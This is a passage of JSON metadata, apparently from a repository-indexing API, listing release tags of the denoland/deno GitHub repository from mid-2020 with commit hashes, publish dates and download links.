pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-